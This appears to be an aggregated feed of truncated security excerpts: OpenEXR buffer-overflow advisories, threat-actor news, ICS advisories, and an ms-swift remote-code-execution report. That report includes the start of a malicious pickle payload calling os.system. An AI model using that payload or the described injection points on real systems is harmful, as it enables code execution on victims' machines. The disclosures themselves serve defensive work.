#mac

### Summary The OpenEXRCore code is vulnerable to a heap-based buffer overflow during a read operation due to bad pointer math when decompressing DWAA-packed scan-line EXR files with a maliciously forged chunk. ### Details In the `LossyDctDecoder_execute` function (from `src/lib/OpenEXRCore/internal_dwa_decoder.h`, when SSE2 is enabled), the following code is used to copy data from the chunks: ```cpp // no-op conversion to linear for (int y = 8 * blocky; y < 8 * blocky + maxY; ++y) { __m128i* restrict dst = (__m128i *) chanData[comp]->_rows[y]; __m128i const * restrict src = (__m128i const *)&rowBlock[comp][(y & 0x7) * 8]; for (int blockx = 0; blockx < numFullBlocksX; ++blockx) { _mm_storeu_si128 (dst, _mm_loadu_si128 (src)); // src += 8 * 8; // <--- si128 pointer incremented as a uint16_t dst += 8; } } ``` The issue arises because the `src` pointer, which is a `si128` pointer, is incremented by `8*8`, as if it were a `uint16_t` pointer...

### Summary The OpenEXRCore code is vulnerable to a heap-based buffer overflow during a write operation when decompressing ZIPS-packed deep scan-line EXR files with a maliciously forged chunk header. ### Details When parsing `STORAGE_DEEP_SCANLINE` chunks from an EXR file, the following code (from `src/lib/OpenEXRCore/chunk.c`) is used to extract the chunk information: ```cpp if (part->storage_mode == EXR_STORAGE_DEEP_SCANLINE) // SNIP... cinfo->sample_count_data_offset = dataoff; cinfo->sample_count_table_size = (uint64_t) ddata[0]; cinfo->data_offset = dataoff + (uint64_t) ddata[0]; cinfo->packed_size = (uint64_t) ddata[1]; cinfo->unpacked_size = (uint64_t) ddata[2]; // SNIP... ``` By storing this information, the code that will later decompress and reconstruct the chunk bytes, will know how much space the uncompressed data will occupy. This size is carried along in the chain of decoding/decompression...

This week Bill connects the hype of literary awards to cybersecurity conference season. We highlight key insights from the Q2 2025 IR Trends report, including phishing trends, new ransomware strains, and top targeted sectors. Finally, check out all the places Talos will be at Black Hat.

The FSB cyberespionage group known as Turla seems to have used its control of Russia's network infrastructure to meddle with web traffic and trick diplomats into infecting their computers.

This appears to be a security vulnerability report describing a remote code execution (RCE) exploit in the ms-swift framework through malicious pickle deserialization in adapter model files. The vulnerability allows arbitrary command execution when loading specially crafted adapter models from ModelScope. This occurs when using machine torch version < 2.6.0, while ms-swift accepts torch version >= 2.0 **I. Detailed Description:** 1. Install ms-swift ``` pip install ms-swift -U ``` 2. Start web-ui ``` swift web-ui --lang en ``` 3. After startup, you can access [http://localhost:7860/](http://localhost:7860/) through your browser to see the launched fine-tuning framework program 4. Upload an adapter model repository (cyjhhh/lora_adapter_4_llama3) on ModelScope, where the lora/adapter_model.bin file is generated through the following code: ```python import torch, pickle, os class MaliciousPayload: def __reduce__(self): return (os.system, ("touch /tmp/malicious.txt",)) # A...

View CSAF 1. EXECUTIVE SUMMARY CVSS v4 9.4 ATTENTION: Low attack complexity Vendor: Rockwell Automation Equipment: Lifecycle Services with VMware Vulnerabilities: Out-of-bounds Write, Use of Uninitialized Resource 2. RISK EVALUATION Successful exploitation of these vulnerabilities could lead to code execution on the host or leakage of memory from processes communicating with vSockets. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS Rockwell Automation reports the following Lifecycle Services with VMware are affected: Industrial Data Center (IDC) with VMware: Generations 1 – 4 VersaVirtual Appliance (VVA) with VMware: Series A & B Threat Detection Managed Services (TDMS) with VMware: All versions Endpoint Protection Service with Rockwell Automation Proxy & VMware only: All versions Engineered and Integrated Solutions with VMware: All versions 3.2 Vulnerability Overview 3.2.1 Out-of-bounds Write CWE-787 An integer-overflow vulnerability exists in the VMXNET3 virtual network adapter used in VM...

The EVE X1 server suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'passwd' HTTP POST parameter in /ajax/php/login.php script.

The controller suffers from an unauthenticated file disclosure vulnerability. Using the 'db_log' POST parameter, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.

The financially motivated threat actor known as UNC2891 has been observed targeting Automatic Teller Machine (ATM) infrastructure using a 4G-equipped Raspberry Pi as part of a covert attack. The cyber-physical attack involved the adversary leveraging their physical access to install the Raspberry Pi device and have it connected directly to the same network switch as the ATM, effectively placing

LLMs may serve as powerful assistants to malware analysts to streamline workflows, enhance efficiency, and provide actionable insights during malware analysis.